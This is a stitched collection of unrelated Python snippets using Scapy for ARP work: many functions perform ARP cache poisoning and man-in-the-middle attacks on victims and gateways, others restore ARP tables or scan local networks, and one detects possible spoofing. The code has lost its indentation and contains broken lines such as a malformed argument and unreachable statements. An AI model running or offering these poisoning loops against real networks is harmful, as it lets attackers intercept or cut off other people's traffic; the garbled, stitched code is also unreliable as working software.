def run(self):
debug('ARP cache poisoning thread waiting for victims...')
ip = q.get()
debug('Acquired first victim... %s' % ip)
pe = Ether(src=self.mac, dst=self.rmac)
pa = ARP(op='who-has', hwsrc=self.mac, psrc=ip, pdst=ip, hwdst=self.rmac)
oldmac = self.whohas(ip)
oldip = ip
while True:
try:
ip = q.get_nowait()
if oldmac is not None:
debug('Healing victim %s/%s' % (oldip, oldmac))
pa.psrc = oldip
pa.hwsrc = oldmac
sendp(pe/pa, verbose=0)
if ip is None:
break
else:
debug('Changing victim to %s...' % ip)
pa.psrc = ip
pa.hwsrc = self.mac
oldip = ip
oldmac = self.whohas(ip)
except Empty:
# Send the poison... all your base are belong to us!
sendp(pe/pa, verbose=0)
sleep(1/self.poison_rate)
def spoof(from_ip, to_ip, spoofed_mac, hwdest=None):
if not hwdest:
## Broadcast if the mac address can't be retrieved
hwdest = getMacAddress(to_ip) or "ff:ff:ff:ff:ff:ff"
packet = ARP()
packet.hwdest = hwdest
packet.pdst = to_ip
packet.hwsrc = spoofed_mac
packet.psrc = from_ip
send(packet, verbose=0)
return hwdest
def __init__(self, ip, mac):
ether = Ether()
ether.src = mac # Default: network card mac
arp = ARP()
arp.op = arp.is_at
arp.psrc = ip
arp.hwsrc = mac
self.arp = arp
self.ether = ether
def kill(targets, gateway_ip="192.168.1.1", nloop=True):
if targets is not list:
targets = [targets]
a = ARP()
a.psrc = gateway_ip
a.hwsrc = "2b:2b:2b:2b:2b:2b"
a.hwdst = "ff:ff:ff:ff:ff:ff"
while True:
for target in targets:
a.pdst = target
send(a)
if not nloop:
break
def run(self):
debug('ARP cache poisoning thread waiting for victims...')
ip = q.get()
debug('Acquired first victim... %s' % ip)
pe = Ether(src=self.mac, dst=self.rmac)
pa = ARP(op='is-at', hwsrc=self.mac, psrc=ip, hwdst=self.rmac)
while True:
try:
ip = q.get_nowait()
if ip is None:
break
else:
debug('Changing victim to %s...' % ip)
pa.psrc = ip
except Empty:
# Send the poison... all your base are belong to us!
sendp(pe/pa, verbose=0)
sleep(1/self.poison_rate)
def arp_scan(iface, ip):
print("[+] Scan started")
conf.verb = 0
broadcast = "ff:ff:ff:ff:ff:ff"
ether_layer = Ether(dst=broadcast)
arp_layer = ARP(pdst=ip)
packet = ether_layer / arp_layer
ans, unans = srp(packet, iface=iface, timeout=5, inter=0.1)
for sent, recieved in ans:
recieved_ip = recieved[ARP].psrc
recieved_mac = recieved[Ether].src
print("IP= ", recieved_ip, "MAC= ", recieved_mac, "Discovered")
print("[+] Scan completed")
def unspoof(device, pretended):
'''
Send an ARP packet with the right MAC address of the spoofed IP, to
hide your MAC address after the execution.
'''
arp_response = ARP(op=2,
pdst=device,
hwdst=get_mac(device),
psrc=pretended,
hwsrc=get_mac(pretended))
send(arp_response, verbose=False)
def restore(target_ip, host_ip):
# GET HARDWARE ADDRESS OF TARGET
target_mac = get_mac(target_ip)
# GET HARDWARE ADDRESS OF HOST
host_mac = get_mac(host_ip)
# CRAFT ARP RESPONSE PACKET TO RESTORE
arp_response = ARP(pdst=target_ip,
hwdst=target_mac,
psrc=host_ip,
hwsrc=host_mac)
# SEND THE RESTORE PACKET
send(arp_response, verbose=0, count=5)
print("(UN) SPOOFED " + target_ip + ": " + host_ip + " is-at " + host_mac)
def get_ip_from_mac(interface, cidr, mac):
"""
"""
if interface is None or cidr is None:
return None
if mac is None:
results = {}
packet = Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=cidr)
else:
packet = Ether(dst=mac) / ARP(pdst=cidr)
ans, unans = srp(packet, timeout=2, iface=interface, verbose=False)
for s, r in ans:
currentmac = r.sprintf("%Ether.src%")
if mac is None:
results[currentmac] = r.sprintf("%ARP.psrc%")
elif currentmac == mac:
return r.sprintf("%ARP.psrc%")
if mac is None:
return yaml.dump(results)
else:
return None
def _packet_handler(self, pkt):
"""This method is called for each packet received through scapy's sniff function.
Incoming ARP requests are used to spoof involved devices.
Args:
pkt (str): Received packet via scapy's sniff (through socket.recv).
"""
# when ARP request
if pkt[ARP].op == 1:
# packets intended for this machine (upribox)
if pkt[Ether].dst == self.ip.mac:
# incoming packets(that are sniffed): Windows correctly fills in the hwdst, linux (router) only 00:00:00:00:00:00
# this answers packets asking if we are the gateway (directly not via broadcast)
# Windows does this 3 times before sending a broadcast request
sendp(
Ether(dst=pkt[Ether].src) / ARP(op=2,
psrc=pkt[ARP].pdst,
pdst=pkt[ARP].psrc,
hwdst=pkt[ARP].hwsrc,
hwsrc=self.ip.mac))
# broadcast request to gateway
elif pkt[Ether].dst.lower() == util.hex2str_mac(
ETHER_BROADCAST) and (pkt[ARP].pdst == self.ip.gateway):
# pkt[ARP].psrc == self.gateway or
# spoof transmitter
packets = [
Ether(dst=pkt[Ether].src) / ARP(op=2,
psrc=pkt[ARP].pdst,
pdst=pkt[ARP].psrc,
hwsrc=self.ip.mac,
hwdst=pkt[ARP].hwsrc)
]
# some os didn't accept an answer immediately (after sending the first ARP request after boot
# so, send packets after some delay
threading.Timer(self._DELAY, sendp, [packets]).start()
def spoof(target_ip, host_ip, my_mac):
"""Spoofs `target_ip` saying that we are `host_ip`
Args:
target_ip (string): The ip's victim
host_ip (string): Your ip address
"""
# craft the arp 'who-has' operation packet, in other words: an ARP response
arp_response = Ether() / ARP(
op='who-has', hwsrc=my_mac, pdst=target_ip, psrc=host_ip)
sendp(arp_response, verbose=0)
print(".", end=" ", flush=True)
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs 'target_ip' saying that we are 'host_ip'
it is accomplished by changing the ARP cache of the target (poisoning)
"""
# get the mac address of the target
target_mac = get_mac(target_ip)
# craft the arp 'is-at' operation packet, in other words; an ARP response
# we don't specifiy 'hwsrc' (source MAC address)
# because by default, 'hwsrc' is the real MAC address of the sender (ours)
arp_response = ARP(pdst=target_ip,
hwdst=target_mac,
psrc=host_ip,
op='is-at')
# send the packet
# verbose = 0 means that we send the packet without printing anything
send(arp_response, verbose=0)
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip,
self_mac))
def retrieve_arp_mac(self):
'''
Auto constructor
@param (ip_address, type=string) - Target IP address
@return bytarray/string
'''
cfg = Config()
mac_address, ax = srp(Ether(dst=cfg.ESPI_MAC_ADDRESS_FORMAT) /
ARP(pdst=self.ip_address),
timeout=3,
verbose=0)
if mac_address:
return mac_address[0][1].src
def netscan_scapy(dev):
network = ifconfig.getAddr(dev)
netmask = ifconfig.getMask(dev)
netsize = netmask2netsz(netmask)
ans, unans = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / \
ARP(pdst="{0}/{1}".format(network, netsize)),
timeout=0.1, iface=dev)
for request, responce in ans:
yield responce.payload.fields['hwsrc'].upper(
), responce.payload.fields['psrc']
def arp_poison_callback(packet):
# Got ARP request?
if packet[ARP].op == 1:
answer = Ether(dst=packet[ARP].hwsrc) / ARP()
answer[ARP].op = "is-at"
answer[ARP].hwdst = packet[ARP].hwsrc
answer[ARP].psrc = packet[ARP].pdst
answer[ARP].pdst = packet[ARP].psrc
print "Envenenando a la " + packet[ARP].psrc + " diciendo que " + \
packet[ARP].pdst + " soy yo"
sendp(answer, iface=sys.argv[1])
def restore(target_ip, host_ip, verbose=True):
target_mac = get_mac(target_ip)
host_mac = get_mac(host_ip)
arp_response = ARP(pdst=target_ip,
hwdst=target_mac,
psrc=host_ip,
hwsrc=host_mac)
send(arp_response, verbose=0, count=7)
if verbose:
if language == "English":
print(f"[+] Sent to {target_ip} : {host_ip} is-at {host_mac}")
else:
print(f"[+] Inviato a {target_ip} : {host_ip} is-at {host_mac}")
def arp_poision_callback(packet):
# 也就是说我能收到arp包,然后给出回应,
if packet[ARP].op == 1:
answer = Ether(dst=packet[ARP].hwsrc) / ARP()
answer[ARP].op = 'is-at'
answer[ARP].hwdst = packet[ARP].hwsrc
answer[ARP].psrc = packet[ARP].pdst
answer[ARP].pdst = packet[ARP].psrc
print('fooling' + packet[ARP].psrc + 'that' + packet[ARP].pdst +
'is me')
sendp(answer, iface='en0')
def arp_poison_loop():
print('poisoning started')
try:
while True:
arp_poison(routerIP, routerMAC, victimIP, victimMAC)
time.sleep(2)
except KeyboardInterrupt:
print("restoring")
arp_victim = ARP(pdst=victimIP,
hwdst=victimMAC,
psrc=routerIP,
hwsrc=routerMAC,
op='is-at')
send(arp_victim)
arp_router = ARP(pdst=routerIP,
hwdst=routerMAC,
psrc=victimIP,
hwsrc=victimMAC,
op='is-at')
send(arp_router)
disable_forward()
print("restored")
def arp_poison_callback(packet):
# Got ARP request?
if packet[ARP].op == 1:
answer = Ether(dst0packet[ARP].hwsrc) / ARP()
answer[ARP].op = "is-at"
answer[ARP].hwdst = packet[ARP].hwsrc
answer[ARP].psrc = packet[ARP].pdst
answer[ARP].pdst = packet[ARP].psrc
print "Fooling " + packet[ARP].psrc + " that " + \
packet[ARP].pdst + " is me"
sendp(answer, iface=sys.argv[1])
def restore(self, delay, target_b=None):
if not target_b:
target_b = self.gateway
src_mac = ':'.join(
a + b for a, b in zip(self.src_mac[::2], self.src_mac[1::2]))
if not isinstance(self.target, list):
dst_mac = utils.get_mac_by_ip(self.target)
send(ARP(op=2,
pdst=target_b,
psrc=self.target,
hwdst="ff:" * 5 + "ff",
hwsrc=dst_mac),
count=3,
verbose=False)
send(ARP(op=2,
pdst=self.target,
psrc=target_b,
hwdst="ff:" * 5 + "ff",
hwsrc=src_mac),
count=3,
verbose=False)
else:
for addr in self.target:
dst_mac = utils.get_mac_by_ip(addr)
send(ARP(op=2,
pdst=target_b,
psrc=addr,
hwdst="ff:" * 5 + "ff",
hwsrc=dst_mac),
count=3,
verbose=False)
send(ARP(op=2,
pdst=addr,
psrc=target_b,
hwdst="ff:" * 5 + "ff",
hwsrc=src_mac),
count=3,
verbose=False)
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs `target_ip` saying that we are `host_ip`.
it is accomplished by changing the ARP cache of the target (poisoning)
"""
# get the mac address of the target
target_mac = get_mac(target_ip)
# craft the arp 'is-at' operation packet, in other words; an ARP response
# we don't specify 'hwsrc' (source MAC address)
# because by default, 'hwsrc' is the real MAC address of the sender (ours)
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
# send the packet
# verbose = 0 means that we send the packet without printing any thing
send(arp_response, verbose=0)
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def restore(target_ip, host_ip, verbose=True):
"""
Restores the normal process of a regular network
This is done by sending the original informations
(real IP and MAC of `host_ip` ) to `target_ip`
"""
# get the real MAC address of target
target_mac = get_mac(target_ip)
# get the real MAC address of spoofed (gateway, i.e router)
host_mac = get_mac(host_ip)
# crafting the restoring packet
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac)
# sending the restoring packet
# to restore the network to its normal process
# we send each reply seven times for a good measure (count=7)
send(arp_response, verbose=0, count=7)
if verbose:
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
def arpspoof_via_scapy(impersonated_host, victim_ip):
from scapy.all import ARP,IP,send,srp,sr1,conf
# Note that we're using scapy, so the ARP spoof shutdown code knows it needs to send
# corrective ARP replies.
ml.arpspoof_via_scapy = 1
pid = os.fork()
if pid:
ml.jjlog.debug("Forking to handle arpspoofing via process %d\n" % pid)
# Let's add this process to a list of child processes that we will need to
# explicitly shut down.
ml.child_pids_to_shutdown.append(pid)
else:
# Turn off scapy's verbosity?
conf.verb=0
# Build an ARP response to set up spoofing
arp_response = ARP()
# define a constant for ARP responses
const_ARP_RESPONSE = 2
# Set the type to a ARP response
arp_response.op = const_ARP_RESPONSE
# Hardware address we want to claim the packet
arp_response.hwsrc = ml.my_mac
# IP address we want to map to that address
arp_response.psrc = impersonated_host
# Now set the ARP response target
non_broadcast=0
if non_broadcast:
# MAC address and IP address of our victim
arp_response.hwdst = lookup_mac_via_scapy(victim_ip)
arp_response.pdst = victim_ip
else:
arp_response.hwdst = "ff:ff:ff:ff:ff:ff"
arp_response.pdst = ml.my_broadcast
# Issue the ARP response every 5 seconds
while(1):
send(arp_response)
sleep(3)
print "Arpspoofing dying"
exit
def ARPing(self):
victimMAC = self.mac_getter(self.victimIP)
AP_MAC = self.mac_getter(self.gatewayIP)
# Creating and sending ARP packets for try to hide the attack
send(ARP(op=2,
pdst=self.victimIP,
psrc=self.gatewayIP,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=AP_MAC),
count=10)
send(ARP(op=2,
pdst=self.gatewayIP,
psrc=self.victimIP,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=victimMAC),
count=10)
# Disabling IP Forwarding
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
exit()
def __scanNetworkScapy(self, ip):
"""Arping function takes IP Address or Network, returns nested ip/mac list"""
machines = []
try:
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
timeout=2,
verbose=False)
for snd, rcv in ans:
result = ((
rcv.sprintf(r"%ARP.psrc% %Ether.src%")).upper().split())
machines.append(result)
except:
pass
return sorted(machines, key=lambda machines: machines[1])
def build_arp_ns_pkt(family, smac, src_ip, dst_ip):
if family == 'IPv4':
eth = Ether(src=smac, dst='ff:ff:ff:ff:ff:ff')
pkt = eth/ARP(op='who-has', pdst=dst_ip)
elif family == 'IPv6':
nsma = in6_getnsma(inet_pton(AF_INET6, dst_ip))
mcast_dst_ip = inet_ntop(AF_INET6, nsma)
dmac = in6_getnsmac(nsma)
eth = Ether(src=smac,dst=dmac)
ipv6 = IPv6(src=src_ip, dst=mcast_dst_ip)
ns = ICMPv6ND_NS(tgt=dst_ip)
ns_opt = ICMPv6NDOptSrcLLAddr(lladdr=smac)
pkt = eth/ipv6/ns/ns_opt
return pkt
def arp_scan(ip):
config = load_config()
interface = config['arpConfig']['interface']
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst = ip),
timeout = 2,
iface = interface,
inter = 0.1)
for snd, rcv in ans:
mac_addr = rcv.sprintf(r"%Ether.src%")
return mac_addr
def bbb(xx_ip):
a = ARP(pdst=xx_ip)
b = sr1(a, verbose=False, timeout=2)
if b:
print('\033[36m[O] 开始扫描,正在扫描中...\033[0m')
#print(int(data['comes'])+1)
for i in range(1, int(data['comes']) + 1):
t = Thread(target=ccc, args=(xx_ip, int(i)))
t.start()
sleep(0.0001)
else:
print('\033[31m[X] E: ip XX??\033[0m')
fe = 1
def arp_ping(self, destination):
"""
The fastest way to discover hosts on a local
ethernet network is to use the ARP Ping method.
-- https://scapy.readthedocs.io/en/latest/usage.html#arp-ping
:param destination: Network to scan.
:param delay: How long to delay before starting the network scan.
"""
log.info('Sending ARP ping request to {destination}'.format(**locals()))
# "srp" means: Send and receive packets at layer 2.
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=destination), timeout=10, verbose=self.VERBOSITY)
return ans, unans
def _getMacAddress(self, interface, ipAddress):
f = '\033[91m'
e = '\033[0m'
while (True):
ans, uans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(pdst=ipAddress),
timeout=2,
iface=interface,
verbose=False)
if (len(ans)): break
else:
print(f + "[!] " + ipAddress +
"에 대한 MAC 주소를 얻지못했습니다. 잠시후 다시 시도됩니다." + e)
return ans[0][1].hwsrc
def build_req():
"""
以请求包的方式进行欺骗,目的是欺骗网关,让网关把所有的发给被害主机的数据给为本机发一份,同时被害主机毫无察觉。
"""
gateway_mac = getmacbyip(args[0])
if options is None: # 广播欺骗
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(
hwsrc=mac,
psrc=options.target,
hwdst=gateway_mac,
pdst=args[0],
op=1)
elif options.target: # 定向欺骗
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=gateway_mac) / ARP(hwsrc=mac,
psrc=options.target,
hwdst=gateway_mac,
pdst=args[0],
op=1)
return pkt
def _arp_ping(mac_address, ip_address):
result = False
answered, unanswered = srp(Ether(dst=mac_address) /
ARP(pdst=ip_address),
timeout=1,
verbose=False)
if len(answered) > 0:
for reply in answered:
if reply[1].hwsrc == mac_address:
if type(result) is not list:
result = []
result.append(str(reply[1].psrc))
result = ', '.join(result)
return result
def main():
''' init the parameters '''
parser = optparse.OptionParser("usage: %prog -v <victimIP> -g <gatewayIP>")
parser.add_option('-v', dest='victimIP', type='string', help='the specified targate ip')
parser.add_option('-g', dest='gatewayIP', type='string', help='the specified gateway ip')
(options, args) = parser.parse_args()
if (options.victimIP == None) | (options.gatewayIP == None):
print parser.usage
exit(0)
else:
victimIP = options.victimIP
gatewayIP = options.gatewayIP
''' MitM attack '''
try:
attackGateway = Ether()/ARP(psrc=victimIP, pdst=gatewayIP)
attackTarget = Ether()/ARP(psrc=gatewayIP, pdst=victimIP)
print '[ok]:MitM attack is running'
sendp(attackGateway, inter=1, loop=1) # send the data package to the target host circularly
sendp(attackTarget, inter=1, loop=1) # send the data package to the gateway circularly
except: # except optparser.TypeError as e:
pass # print 'error:please enter the correct parameters'
def execute(self):
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(),
verbose=0,
timeout=config.network_timeout)[IP].dst
arp_responses, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(op=1, pdst=f"{self_ip}/24"),
timeout=config.netork_timeout,
verbose=0)
# arp enabled on cluster and more than one pod on node
if len(arp_responses) > 1:
# L3 plugin not installed
if not self.detect_l3_on_host(arp_responses):
self.publish_event(PossibleArpSpoofing())
def get_mac_gateway(ip_address):
response, unanswered = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_address), \
timeout=2, retry=2)
for s, r in response:
return r[Ether].src
return None
logging.info('Gateway Layer 2 address is: %s' % r[Ether].src)
global GATEWAY_MAC
GATEWAY_MAC = "%s" % r[Ether].src
def arp_poison(gateway_ip, target_ips):
print("Starting attack... [Ctrl+C to stop]")
try:
gateway_mac = target_ips[gateway_ip]
while True:
for target_ip in target_ips:
if target_ip != gateway_ip:
target_mac = target_ips[target_ip]
send(
ARP(op=2,
pdst=target_ip,
hwdst=target_mac,
psrc=gateway_ip,
hwsrc=MAC))
send(
ARP(op=2,
pdst=gateway_ip,
hwdst=gateway_mac,
psrc=target_ip,
hwsrc=MAC))
except KeyboardInterrupt:
print("Attack interrupted. Restoring network...")
restoreNetwork(gateway_ip, target_ips)
def get_mac(ip, interface):
"""Returns the according MAC address for the provided IP address.
Args:
ip (str): IP address used to get MAC address.
interface (str): Interface used to send ARP reuest.
Results:
According MAC address as string (11:22:33:44:55:66)
or None if no answer has been received.
"""
ans, unans = srp(Ether(dst=ETHER_BROADCAST) / ARP(pdst=ip), timeout=2, iface=interface, inter=0.1, verbose=0)
for snd, rcv in ans:
return rcv.sprintf(r"%Ether.src%")
def poison_target(self):
target_poison_packet = ARP()
target_poison_packet.op = 2
target_poison_packet.psrc = self._arg["gateway_ip"]
target_poison_packet.pdst = self._arg["target_ip"]
target_poison_packet.hwdst = self._arg["target_mac"]
gateway_poison_packet = ARP()
gateway_poison_packet.op = 2
gateway_poison_packet.psrc = self._arg["target_ip"]
gateway_poison_packet.pdst = self._arg["gateway_ip"]
gateway_poison_packet.hwdst = self._arg["gateway_mac"]
self.poisoning = True
print("[*] Beginning the ARP poison. [CTRL-C to stop]")
while self.poisoning:
send(target_poison_packet)
send(gateway_poison_packet)
time.sleep(2)
print("[*] ARP poison attack finished")
def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
ether = Ether()
ether.src = my_mac
arp = ARP()
arp.psrc = gateway_ip
arp.hwsrc = my_mac
arp = arp
arp.pdst = target_ip
arp.hwdst = target_mac
ether = ether
ether.src = my_mac
ether.dst = target_mac
arp.op = 2
def broadcastPacket():
packet = ether / arp
sendp(x=packet, verbose=False)
broadcastPacket()
def arp_hack(mac, ip):
p = ARP(op=2, hwsrc=GATEWAY_MAC, psrc=GATEWAY_IP)
p.hwdst = mac
p.pdst = ip
send(p)
#!/usr/bin/python import sys from scapy.all import ARP,send a=ARP() a.hwsrc="aa:aa:aa:aa:aa:aa" #a.psrc="192.168.1.93" #a.hwdst="d4:be:d9:dc:4c:20" #a.pdst="192.168.1.12" #a.hwdst="00:00:00:00:00:00" #a.pdst="0.0.0.0" a.psrc="0.0.0.0" a.hwdst="ff:ff:ff:ff:ff:ff" a.pdst="255.255.255.255" send(a)